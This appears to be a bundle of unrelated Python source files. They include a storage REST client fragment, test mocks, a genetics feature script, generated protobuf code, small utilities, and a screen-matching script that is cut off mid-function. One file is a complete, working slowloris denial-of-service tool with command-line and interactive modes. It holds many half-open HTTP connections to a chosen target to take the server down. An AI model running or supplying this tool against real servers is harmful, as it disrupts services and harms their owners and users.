% {'service': service,
'status': status,
'host': self.host})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def enable_service(self, service):
self._change_service_state(service, state='enable')
self.verify_service(service)
def disable_service(self, service):
self._change_service_state(service, state='disable')
self.verify_service(service, status='offline')
def verify_service(self, service, status='online'):
"""Checks whether a service is online or not"""
svc = self.services_path + service
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Verifying '
'Service: %(service)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'service': service,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
data = json.loads(ret.data)['service']
if data['<status>'] != status:
exception_msg = (_('%(service)s Service is not %(status)s '
'on storage appliance: %(host)s')
% {'service': service,
'status': status,
'host': self.host})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def modify_service(self, service, edit_args=None):
"""Edit service properties"""
if edit_args is None:
edit_args = {}
svc = self.services_path + service
ret = self.rclient.put(svc, edit_args)
if ret.status != restclient.Status.ACCEPTED:
exception_msg = (_('Error modifying '
'Service: %(service)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'service': service,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
data = json.loads(ret.data)['service']
LOG.debug('Modify %(service)s service '
'return data: %(data)s',
{'service': service,
'data': data})
def create_share(self, pool, project, share, args):
"""Create a share in the specified pool and project"""
svc = self.share_path % (pool, project, share)
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
svc = self.shares_path % (pool, project)
args.update({'name': share})
ret = self.rclient.post(svc, args)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating '
'Share: %(name)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'name': share,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
else:
LOG.debug('Editing properties of a pre-existing share')
ret = self.rclient.put(svc, args)
if ret.status != restclient.Status.ACCEPTED:
exception_msg = (_('Error editing share: '
'%(share)s on '
'Pool: %(pool)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'share': share,
'pool': pool,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def get_share(self, pool, project, share):
"""return share properties"""
svc = self.share_path % (pool, project, share)
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Getting '
'Share: %(share)s on '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'share': share,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
val = json.loads(ret.data)
return val['filesystem']
|
python
|
"""This module provides a mock callable class."""
from __future__ import annotations
import queue
import unittest.mock
from typing import Any, Dict, NamedTuple, Optional, Tuple
from .consumer import ConsumerAsserter, MockConsumerGroup
class MockCallableGroup:
"""This class implements a group of callables."""
class _CallableInfo(NamedTuple):
name: str
args: Tuple
kwargs: Dict[str, Any]
def __init__(
self: MockCallableGroup,
*callables: str,
timeout: Optional[float] = 1.0,
) -> None:
"""
Initialise a new instance.
:param timeout: number of seconds to wait for the callable to be
called, or None to wait forever. The default is 1.0 seconds.
:param callables: names of callables in this group.
"""
self._queue: queue.SimpleQueue[
MockCallableGroup._CallableInfo
] = queue.SimpleQueue()
characterizers = {category: None for category in callables}
self._mock_consumer_group = MockConsumerGroup(
lambda timeout: self._queue.get(timeout=timeout),
lambda callable_info: callable_info.name,
timeout,
**characterizers,
)
self._callables = {
name: self._Callable(
self._queue, name, self._mock_consumer_group[name]
)
for name in callables
}
def __getitem__(
self: MockCallableGroup,
callable_name: str,
) -> MockCallableGroup._Callable:
"""
Return a standalone callable for the specified callable_name.
This can be passed to the caller to be actually called, and it
can also be used to assert calls.
:param callable_name: name of the callable sought.
:return: a standalone mock callable
"""
return self._callables[callable_name]
def assert_call(
self: MockCallableGroup,
callable_name: str,
*args: Any,
**kwargs: Any,
) -> None:
"""
Assert that the specified callable has been called as specified.
:param callable_name: name of the callable that we are asserting
to have been called
:param args: positional arguments asserted to be in the call
:param kwargs: keyword arguments. An optional "lookahead"
keyword argument may be used to specify the number of calls
to examing in search of a matching call. The default is 1,
which means we are asserting on the *next* call, All other
keyword arguments are part of the asserted call.
:raises AssertionError: if the asserted call has not occurred
within the timeout period
"""
lookahead = kwargs.pop("lookahead", 1)
try:
self._mock_consumer_group.assert_item(
(callable_name, args, kwargs), lookahead=lookahead
)
except AssertionError as assertion_error:
raise AssertionError(
f"Callable has not been called with args {args}, kwargs "
f"{kwargs}."
) from assertion_error
def assert_not_called(self: MockCallableGroup) -> None:
"""
Assert that no callable in this group has been called.
:raises AssertionError: if one of the callables in this group
has been called.
"""
try:
self._mock_consumer_group.assert_no_item()
except AssertionError as assertion_error:
raise AssertionError(
"Callable has been called."
) from assertion_error
class _Callable:
"""A view on a single callable."""
def __init__(
self: MockCallableGroup._Callable,
call_queue: queue.SimpleQueue,
name: str,
consumer_view: ConsumerAsserter,
) -> None:
"""
Initialise a new instance.
:param call_queue: the queue in which calls are places
:param name: the name of this callable
:param consumer_view: the underlying view on the consumer
"""
self._call_queue = call_queue
self._name = name
self._consumer_view = consumer_view
self._mock_configuration: Dict[str, Any] = {}
def configure_mock(self, **configuration: Any) -> None:
"""
Configure the underlying mock.
:param configuration: keyword arguments to be passed to the
underlying mock.
"""
self._mock_configuration = configuration
def __call__(
self: MockCallableGroup._Callable, *args: Any, **kwargs: Any
) -> Any:
"""
Register a call on this callable.
:param args: positional arguments in the call
:param kwargs: keyword arguments in the call
:return: whatever this callable is configured to return
"""
self._call_queue.put(
MockCallableGroup._CallableInfo(self._name, args, kwargs)
)
mock = unittest.mock.Mock(self._mock_configuration)
return mock(*args, **kwargs)
def assert_call(
self: MockCallableGroup._Callable,
*args: Any,
**kwargs: Any,
) -> None:
"""
Assert that this callable has been called as specified.
:param args: positional arguments asserted to be in the call
:param kwargs: keyword arguments. An optional "lookahead"
keyword argument may be used to specify the number of
calls to examine in search of a matching call. The
default is 1, which means we are asserting on the *next*
call, All other keyword arguments are part of the
asserted call.
:raises AssertionError: if the asserted call has not
occurred within the timeout period
"""
lookahead = kwargs.pop("lookahead", 1)
try:
self._consumer_view.assert_item(
(self._name, args, kwargs), lookahead=lookahead
)
except AssertionError as assertion_error:
raise AssertionError(
f"Callable has not been called with args {args}, kwargs "
f"{kwargs}."
) from assertion_error
def assert_not_called(self: MockCallableGroup._Callable) -> None:
"""
Assert that this callable has not been called.
:raises AssertionError: if this callable has been called.
"""
try:
self._consumer_view.assert_no_item()
except AssertionError as assertion_error:
raise AssertionError(
"Callable has been called."
) from assertion_error
class MockCallable:
"""A class for a single mock callable."""
def __init__(self: MockCallable, timeout: Optional[float] = 1.0) -> None:
"""
Initialise a new instance.
:param timeout: how long to wait for the call, in seconds, or
None to wait forever. The default is 1 second.
"""
name = "__mock_callable"
self._view = MockCallableGroup(name, timeout=timeout)[name]
def configure_mock(self: MockCallable, **configuration: Any) -> None:
"""
Configure the underlying mock.
:param configuration: keyword arguments to be passed to the
underlying mock.
"""
self._view.configure_mock(**configuration)
def assert_call(
self: MockCallable,
*args: Any,
**kwargs: Any,
) -> None:
"""
Assert that this callable has been called as specified.
:param args: positional arguments asserted to be in the call
:param kwargs: keyword arguments. An optional "lookahead"
keyword argument may be used to specify the number of calls
to examing in search of a matching call. The default is 1,
which means we are asserting on the *next* call, All other
keyword arguments are part of the asserted call.
:raises AssertionError: if the asserted call has not
occurred within the timeout period
"""
try:
self._view.assert_call(*args, **kwargs)
except AssertionError:
raise
def assert_not_called(self: MockCallable) -> None:
"""
Assert that this callable has not been called.
:raises AssertionError: if this callable has been called.
"""
try:
self._view.assert_not_called()
except AssertionError:
raise
def __call__(self: MockCallable, *args: Any, **kwargs: Any) -> Any:
"""
Register a call on this callable.
:param args: positional arguments in the call
:param kwargs: keyword arguments in the call
:return: whatever this callable is configured to return
"""
return self._view(*args, **kwargs)
|
python
|
# Is Prime
# determine whether the number is prime or not
class isPrime:
def isPrime(self, n):
i = 2
while i * i <= n:
if n % i == 0:
return False
i += 1
return True
ip = isPrime()
print(ip.isPrime(5))
|
python
|
#!/bin/env python
import platform, socket, random, time
_appname_="slowloris"
_version_="0.1"
_description_="fastly take down the web"
_author_="blackc8"
ncol ="\033[0m"
bold ="\033[1m"
dim ="\033[2m"
uline ="\033[4m"
reverse="\033[7m"
red ="\033[31m"
green ="\033[32m"
yellow ="\033[33m"
blue ="\033[34m"
purple ="\033[35m"
cyan ="\033[36m"
white ="\033[37m"
if platform.system == "Windows":
ncol=bold=dim=uline=red=green=yellow=blue=purple=cyan=white=''
def inf(msg,enD="\n"):
print(dim+blue+"[i] "+ncol+bold+blue+msg+ncol,end=enD,flush=True)
def scs(msg,enD="\n"):
print(dim+green+"[+] "+ncol+bold+white+msg+ncol,end=enD,flush=True)
def err(msg,enD="\n"):
print(dim+red+"[-] "+ncol+bold+red+msg+ncol,end=enD)
def wrn(msg):
print(dim+red+"[!] "+ncol+bold+red+msg+ncol)
def ask(msg):
inp=input(purple+dim+"[?] "+ncol+bold+purple+msg+white)
print(ncol,end='')
return inp
def eint(str):
intgr = []
for char in str:
if char.isdigit():
intgr.append(char)
return int("".join(intgr))
def inp(msg,default='',type='str',show=True):
inp=input(bold+green+msg+white)
if inp == "": inp=str(default)
if type == 'int': inp=eint(inp)
if show: print(bold+blue+" ==> "+ncol+str(inp))
return inp
def Eexit(msg):
err(msg)
exit()
min_banner=bold+purple+_appname_+white+"("+green+_version_+white+")["+blue+"blackc8"+white+"]"
# default config
headers = [
"User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36",
"Accept-language: en-US,en"
]
sockets = []
hostname = ""
host_info = ""
def resolve_hostname(hostname):
try:
IPaddr=socket.gethostbyname(hostname)
return IPaddr
except socket.error:
return 0
def validIP(address):
parts = address.split(".")
if len(parts) != 4:
return False
for item in parts:
if not 0 <= int(item) <= 255:
return False
return True
def is_open(host,port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
con = sock.connect_ex((host,port))
sock.close()
return con
def openSocket(host,port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
sock.connect((host,port)) # connect to host
sock.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 1337)).encode("utf-8"))
# send headers
for header in headers:
sock.send("{}\r\n".format(header).encode("utf-8"))
return sock # return socket for later use
def checkHost(host,port):
print("")
scs(white+"Checking host...",enD='')
# resolve and check ip address
if not validIP(host):
hostIP=resolve_hostname(host)
if hostIP == 0:
print(bold+red+"error")
Eexit("Unable to resolve hostname ({})")
else:
hostname=host
host=hostIP
# check host is up and port is open
port_stat=is_open(host,port)
if port_stat != 0:
print(bold+red+"error")
if port_stat == 11:
Eexit("target "+host+" is down!")
if port_stat == 111:
Eexit("target up, but port "+str(port)+" is closed!")
print(bold+green+"OK")
return host
def attack(host,port,Nsocks,delay):
print(bold+blue+reverse+"Starting DoS attack"+ncol)
print(bold+green+" Target ==> "+white+host+":"+str(port)+ncol)
# open Nsocks no. of sockets to port
scs("Opening {} sockets on target...".format(Nsocks),enD='')
for _ in range(Nsocks):
try:
# open socket
sock = openSocket(host,port)
except socket.error:
break
sockets.append(sock) # add socket to array for later use
print(bold+green+"done")
# keep these scokets alive
while True:
scs("Sending headers to connected sockets...",enD='')
for sock in list(sockets):
try:
sock.send("X-a: {}\r\n".format(random.randint(1, 4600)).encode("utf-8"))
except socket.error:
sockets.remove(sock)
print(bold+green+"done")
if Nsocks - len(sockets) > 0:
# reopen closed sockets
scs("Reopening closed sockets...",enD='')
for _ in range(Nsocks - len(sockets)):
try:
# reopen socket
sock = openSocket(host,port)
except socket.error:
break
except:
print(bold+red+"error")
sockets.append(sock) # add the new socket to array
print(bold+green+"done")
inf("Wating {}s.".format(delay))
time.sleep(delay)
def interactive_mode():
big_banner=purple+bold+"""\t _ _ _
\t ___| | _____ _| | ___ _ __(_)___
\t/ __| |/ _ \ \ /\ / / |/ _ \| '__| / __|
\t\__ \ | (_) \ V V /| | (_) | | | \__ \\
\t|___/_|\___/ \_/\_/ |_|\___/|_| |_|___/"""+green+"("+white+_version_+green+")"+red+"\n\n\t\t[ "+_description_+" ]"+white+"\n\t\t © Copyright 2020 blackc8"+white+"\n"
print(big_banner)
print("\t\t "+cyan+"(Interactive Mode)"+ncol)
target=inp("target: ",default="127.0.0.1")
port=inp("port: ",default=80,type='int')
Nsocks=inp("Number of socket: ",default=300,type='int')
delay=inp("delay: ",default=15,type='int')
host=checkHost(target,port)
attack(host,port,Nsocks,delay)
if __name__ == "__main__":
import argparse, sys
parser = argparse.ArgumentParser(description=_description_,epilog="Author: "+_author_)
parser.add_argument("-t","--target",type=str,help="hostname/IP of target")
parser.add_argument("-p","--port",type=int,help="specficy port to attack, default=80",default=80)
parser.add_argument("-s","--sockets",type=int,help="specify number of sockets to open, deafult=300",default=300)
parser.add_argument("-d","--delay",type=int,help="specify delay between packet sending, default=10",default=10)
parser.add_argument("-i","--interactive",help="launch the interactive mode",action="store_true")
args=parser.parse_args()
if args.interactive or len(sys.argv) <= 1:
try:
interactive_mode()
except KeyboardInterrupt:
err("Exting due to Keyboard Interrupt")
exit()
if not args.target:
err("No target specified.Try option -h")
exit()
try:
print(min_banner)
attack(args.target,args.port,args.sockets,args.delay)
except KeyboardInterrupt:
err("Exting due to Keyboard Interrupt")
exit()
|
python
|
import sys, os
import allel
import random
import numpy as np
from diploshic.msTools import *
from diploshic.fvTools import *
import time
(
trainingDataFileName,
totalPhysLen,
numSubWins,
maskFileName,
vcfForMaskFileName,
popForMask,
sampleToPopFileName,
unmaskedGenoFracCutoff,
chrArmsForMasking,
unmaskedFracCutoff,
outStatsDir,
fvecFileName,
) = sys.argv[1:]
totalPhysLen = int(totalPhysLen)
numSubWins = int(numSubWins)
subWinLen = totalPhysLen // numSubWins
assert totalPhysLen % numSubWins == 0 and numSubWins > 1
sys.stderr.write("file name='%s'" % (trainingDataFileName))
(
trainingDataFileObj,
sampleSize,
numInstances,
) = openMsOutFileForSequentialReading(trainingDataFileName)
if maskFileName.lower() in ["none", "false"]:
sys.stderr.write(
"maskFileName='%s': not masking any sites!\n" % (maskFileName)
)
maskFileName = False
unmaskedFracCutoff = 1.0
else:
chrArmsForMasking = chrArmsForMasking.split(",")
unmaskedFracCutoff = float(unmaskedFracCutoff)
if unmaskedFracCutoff > 1.0 or unmaskedFracCutoff < 0.0:
sys.exit(
"unmaskedFracCutoff must lie within [0, 1]. AAARRRRGGGGHHHHH!!!!\n"
)
if vcfForMaskFileName.lower() in ["none", "false"]:
sys.stderr.write(
"vcfForMaskFileName='%s': not masking any genotypes!\n"
% (vcfForMaskFileName)
)
vcfForMaskFileName = False
else:
if not maskFileName:
sys.exit(
"Cannot mask genotypes without also supplying a file for masking entire sites (can use reference genome with Ns if desired). AAARRRGHHHHH!!!!!!\n"
)
if sampleToPopFileName.lower() in [
"none",
"false",
] or popForMask.lower() in [
"none",
"false",
]:
sampleToPopFileName = None
sys.stderr.write(
"No sampleToPopFileName specified. Using all individuals for masking genotypes.\n"
)
unmaskedGenoFracCutoff = float(unmaskedGenoFracCutoff)
if unmaskedGenoFracCutoff > 1.0 or unmaskedGenoFracCutoff < 0.0:
sys.exit(
"unmaskedGenoFracCutoff must lie within [0, 1]. AAARRRRGGGGHHHHH!!!!\n"
)
def getSubWinBounds(subWinLen, totalPhysLen): # get inclusive subwin bounds
subWinStart = 1
subWinEnd = subWinStart + subWinLen - 1
subWinBounds = [(subWinStart, subWinEnd)]
numSubWins = totalPhysLen // subWinLen
for i in range(1, numSubWins - 1):
subWinStart += subWinLen
subWinEnd += subWinLen
subWinBounds.append((subWinStart, subWinEnd))
subWinStart += subWinLen
# if our subwindows are 1 bp too short due to rounding error, the last window picks up all of the slack
subWinEnd = totalPhysLen
subWinBounds.append((subWinStart, subWinEnd))
return subWinBounds
if not maskFileName:
unmasked = [True] * totalPhysLen
else:
drawWithReplacement = False
sys.stderr.write("reading masking data...")
maskData = readMaskDataForTraining(
maskFileName,
totalPhysLen,
subWinLen,
chrArmsForMasking,
shuffle=True,
cutoff=unmaskedFracCutoff,
genoCutoff=unmaskedGenoFracCutoff,
vcfForMaskFileName=vcfForMaskFileName,
pop=popForMask,
sampleToPopFileName=sampleToPopFileName,
)
if vcfForMaskFileName:
maskData, genoMaskData = maskData
else:
genoMaskData = [None] * len(maskData)
sys.stderr.write("done!\n")
if len(maskData) < numInstances:
sys.stderr.write(
"Warning: didn't get enough windows from masked data (needed %d; got %d); will draw with replacement!!\n"
% (numInstances, len(maskData))
)
drawWithReplacement = True
else:
sys.stderr.write(
"Got enough windows from masked data (needed %d; got %d); will draw without replacement.\n"
% (numInstances, len(maskData))
)
def getSnpIndicesInSubWins(subWinBounds, snpLocs):
snpIndicesInSubWins = []
for subWinIndex in range(len(subWinBounds)):
snpIndicesInSubWins.append([])
subWinIndex = 0
for i in range(len(snpLocs)):
while not (
snpLocs[i] >= subWinBounds[subWinIndex][0]
and snpLocs[i] <= subWinBounds[subWinIndex][1]
):
subWinIndex += 1
snpIndicesInSubWins[subWinIndex].append(i)
return snpIndicesInSubWins
subWinBounds = getSubWinBounds(subWinLen, totalPhysLen)
# statNames = ["pi", "thetaW", "tajD", "nDiplos","diplo_H2","diplo_H12","diplo_H2/H1","diplo_ZnS","diplo_Omega"]
statNames = [
"pi",
"thetaW",
"tajD",
"distVar",
"distSkew",
"distKurt",
"nDiplos",
"diplo_H1",
"diplo_H12",
"diplo_H2/H1",
"diplo_ZnS",
"diplo_Omega",
]
header = []
for statName in statNames:
for i in range(numSubWins):
header.append("%s_win%d" % (statName, i))
header = "\t".join(header)
statVals = {}
for statName in statNames:
statVals[statName] = []
start = time.perf_counter()
numInstancesDone = 0
sys.stderr.write("ready to process sim reps. here we go!\n")
for instanceIndex in range(numInstances):
sys.stderr.write("starting rep %d of %d\n" % (instanceIndex, numInstances))
hapArrayIn, positionArray = readNextMsRepToHaplotypeArrayIn(
trainingDataFileObj, sampleSize, totalPhysLen
)
haps = allel.HaplotypeArray(hapArrayIn, dtype="i1")
if maskFileName:
if drawWithReplacement:
randIndex = random.randint(0, len(maskData) - 1)
unmasked, genoMasks = maskData[randIndex], genoMaskData[randIndex]
else:
unmasked, genoMasks = (
maskData[instanceIndex],
genoMaskData[instanceIndex],
)
assert len(unmasked) == totalPhysLen
if haps.shape[1] % 2 == 1:
haps = haps[:, :-1]
genos = haps.to_genotypes(ploidy=2)
unmaskedSnpIndices = [
i for i in range(len(positionArray)) if unmasked[positionArray[i] - 1]
]
if len(unmaskedSnpIndices) == 0:
sys.stderr.write("no snps for rep %d\n" % (instanceIndex))
for statName in statNames:
statVals[statName].append([])
for subWinIndex in range(numSubWins):
for statName in statNames:
appendStatValsForMonomorphic(
statName, statVals, instanceIndex, subWinIndex
)
else:
sys.stderr.write("processing snps for rep %d\n" % (instanceIndex))
if maskFileName:
preMaskCount = np.sum(genos.count_alleles())
if genoMasks:
sys.stderr.write(
"%d snps in the masking window for rep %d\n"
% (len(genoMasks), instanceIndex)
)
genos = maskGenos(
genos.subset(sel0=unmaskedSnpIndices), genoMasks
)
else:
genos = genos.subset(sel0=unmaskedSnpIndices)
alleleCountsUnmaskedOnly = genos.count_alleles()
maskedCount = preMaskCount - np.sum(alleleCountsUnmaskedOnly)
sys.stderr.write(
"%d of %d genotypes (%.2f%%) masked for rep %d\n"
% (
maskedCount,
preMaskCount,
100 * maskedCount / preMaskCount,
instanceIndex,
)
)
else:
alleleCountsUnmaskedOnly = genos.count_alleles()
positionArrayUnmaskedOnly = [
positionArray[i] for i in unmaskedSnpIndices
]
snpIndicesInSubWins = getSnpIndicesInSubWins(
subWinBounds, positionArrayUnmaskedOnly
)
for statName in statNames:
statVals[statName].append([])
for subWinIndex in range(numSubWins):
subWinStart, subWinEnd = subWinBounds[subWinIndex]
unmaskedFrac = unmasked[subWinStart - 1 : subWinEnd].count(
True
) / float(subWinLen)
assert unmaskedFrac >= unmaskedFracCutoff
snpIndicesInSubWinUnmasked = snpIndicesInSubWins[subWinIndex]
sys.stderr.write(
"examining subwindow %d which has %d unmasked SNPs\n"
% (subWinIndex, len(snpIndicesInSubWinUnmasked))
)
if len(snpIndicesInSubWinUnmasked) > 0:
genosInSubWin = genos.subset(sel0=snpIndicesInSubWinUnmasked)
for statName in statNames:
calcAndAppendStatValDiplo(
alleleCountsUnmaskedOnly,
positionArrayUnmaskedOnly,
statName,
subWinStart,
subWinEnd,
statVals,
instanceIndex,
subWinIndex,
genosInSubWin,
unmasked,
)
else:
for statName in statNames:
appendStatValsForMonomorphic(
statName, statVals, instanceIndex, subWinIndex
)
numInstancesDone += 1
sys.stderr.write(
"finished %d reps after %f seconds\n"
% (numInstancesDone, time.perf_counter() - start)
)
if numInstancesDone != numInstances:
sys.exit(
"Expected %d reps but only processed %d. Perhaps we are using malformed simulation output!\n"
% (numInstancesDone, numInstances)
)
statFiles = []
if outStatsDir.lower() != "none":
for subWinIndex in range(numSubWins):
statFileName = "%s/%s.%d.stats" % (
outStatsDir,
trainingDataFileName.split("/")[-1].rstrip(".gz"),
subWinIndex,
)
statFiles.append(open(statFileName, "w"))
statFiles[-1].write("\t".join(statNames) + "\n")
with open(fvecFileName, "w") as fvecFile:
fvecFile.write(header + "\n")
for i in range(numInstancesDone):
statLines = []
for subWinIndex in range(numSubWins):
statLines.append([])
outVec = []
for statName in statNames:
outVec += normalizeFeatureVec(statVals[statName][i])
for subWinIndex in range(numSubWins):
statLines[subWinIndex].append(
statVals[statName][i][subWinIndex]
)
if statFiles:
for subWinIndex in range(numSubWins):
statFiles[subWinIndex].write(
"\t".join([str(x) for x in statLines[subWinIndex]]) + "\n"
)
fvecFile.write("\t".join([str(x) for x in outVec]) + "\n")
if statFiles:
for subWinIndex in range(numSubWins):
statFiles[subWinIndex].close()
sys.stderr.write(
"total time spent calculating summary statistics and generating feature vectors: %f secs\n"
% (time.perf_counter() - start)
)
closeMsOutFile(trainingDataFileObj)
|
python
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: second/protos/train.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from second.protos import optimizer_pb2 as second_dot_protos_dot_optimizer__pb2
from second.protos import preprocess_pb2 as second_dot_protos_dot_preprocess__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='second/protos/train.proto',
package='second.protos',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x19second/protos/train.proto\x12\rsecond.protos\x1a\x1dsecond/protos/optimizer.proto\x1a\x1esecond/protos/preprocess.proto\"\xfa\x01\n\x0bTrainConfig\x12+\n\toptimizer\x18\x01 \x01(\x0b\x32\x18.second.protos.Optimizer\x12\r\n\x05steps\x18\x02 \x01(\r\x12\x16\n\x0esteps_per_eval\x18\x03 \x01(\r\x12\x1d\n\x15save_checkpoints_secs\x18\x04 \x01(\r\x12\x1a\n\x12save_summary_steps\x18\x05 \x01(\r\x12\x1e\n\x16\x65nable_mixed_precision\x18\x06 \x01(\x08\x12\x19\n\x11loss_scale_factor\x18\x07 \x01(\x02\x12!\n\x19\x63lear_metrics_every_epoch\x18\x08 \x01(\x08\x62\x06proto3')
,
dependencies=[second_dot_protos_dot_optimizer__pb2.DESCRIPTOR,second_dot_protos_dot_preprocess__pb2.DESCRIPTOR,])
_TRAINCONFIG = _descriptor.Descriptor(
name='TrainConfig',
full_name='second.protos.TrainConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='optimizer', full_name='second.protos.TrainConfig.optimizer', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='steps', full_name='second.protos.TrainConfig.steps', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='steps_per_eval', full_name='second.protos.TrainConfig.steps_per_eval', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='save_checkpoints_secs', full_name='second.protos.TrainConfig.save_checkpoints_secs', index=3,
number=4, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='save_summary_steps', full_name='second.protos.TrainConfig.save_summary_steps', index=4,
number=5, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='enable_mixed_precision', full_name='second.protos.TrainConfig.enable_mixed_precision', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='loss_scale_factor', full_name='second.protos.TrainConfig.loss_scale_factor', index=6,
number=7, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='clear_metrics_every_epoch', full_name='second.protos.TrainConfig.clear_metrics_every_epoch', index=7,
number=8, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=108,
serialized_end=358,
)
_TRAINCONFIG.fields_by_name['optimizer'].message_type = second_dot_protos_dot_optimizer__pb2._OPTIMIZER
DESCRIPTOR.message_types_by_name['TrainConfig'] = _TRAINCONFIG
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
TrainConfig = _reflection.GeneratedProtocolMessageType('TrainConfig', (_message.Message,), {
'DESCRIPTOR' : _TRAINCONFIG,
'__module__' : 'second.protos.train_pb2'
# @@protoc_insertion_point(class_scope:second.protos.TrainConfig)
})
_sym_db.RegisterMessage(TrainConfig)
# @@protoc_insertion_point(module_scope)
|
python
|
'''
Created on Nov 9, 2011
@author: ppa
'''
from analyzer.lib.errors import Errors, UfException
class DAMFactory(object):
''' DAM factory '''
@staticmethod
def createDAM(dam_name, config):
''' create DAM '''
if 'yahoo' == dam_name:
from analyzerdam.yahooDAM import YahooDAM
dam=YahooDAM()
elif 'google' == dam_name:
from analyzerdam.google import GoogleDAM
dam=GoogleDAM()
elif 'excel' == dam_name:
from analyzerdam.excelDAM import ExcelDAM
dam=ExcelDAM()
elif 'hbase' == dam_name:
from analyzerdam.hbaseDAM import HBaseDAM
dam=HBaseDAM()
elif 'sql' == dam_name:
from analyzerdam.sqlDAM import SqlDAM
dam=SqlDAM(config)
elif 'cex' == dam_name:
from analyzerdam.cex import CexDAM
dam=CexDAM(config)
else:
raise UfException(Errors.INVALID_DAM_TYPE,
"DAM type is invalid %s" % dam_name)
return dam
@staticmethod
def getAvailableTypes():
''' return all available types '''
return ['yahoo', 'google', 'excel', 'hbase', 'sql']
|
python
|
from pydantic import BaseModel
class ProfileStats(BaseModel):
visits: int = 0
views: int = 0
counters: dict = {}
|
python
|
import pyautogui
import time
import cv2
import numpy as np
import imutils
def ImageDetection(temp_img,threshold,img_type):
image = pyautogui.screenshot()
img_bgr = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)
img_gray = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2GRAY)
# 0 is for grayscale
template = cv2.imread(temp_img,0)
temp_bgr = cv2.cvtColor(np.array(template), cv2.COLOR_RGB2BGR)
temp_gray = cv2.cvtColor(temp_bgr, cv2.COLOR_BGR2GRAY)
temp_edged = cv2.Canny(temp_gray, 50, 200)
w, h = template.shape[::-1]
found = None
if img_type == "grayscale":
selected_img = img_gray
selected_temp_img = temp_gray
if img_type == "edged":
selected_img = img_gray
selected_temp_img = temp_edged
for scale in np.linspace(0.2, 1.0, 20)[::-1]:
# resize the image according to the scale, and keep track
# of the ratio of the resizing
resized = imutils.resize(selected_img, width = int(selected_img.shape[1] * scale))
r = selected_img.shape[1] / float(resized.shape[1])
# if the resized image is smaller than the template, then break
# from the loop
# detect edges in the resized, grayscale image and apply template
# matching to find the template in the image edged
# if we have found a new maximum correlation value, then update
# the found variable if found is None or maxVal > found[0]:
if resized.shape[0] < h or resized.shape[1] < w:
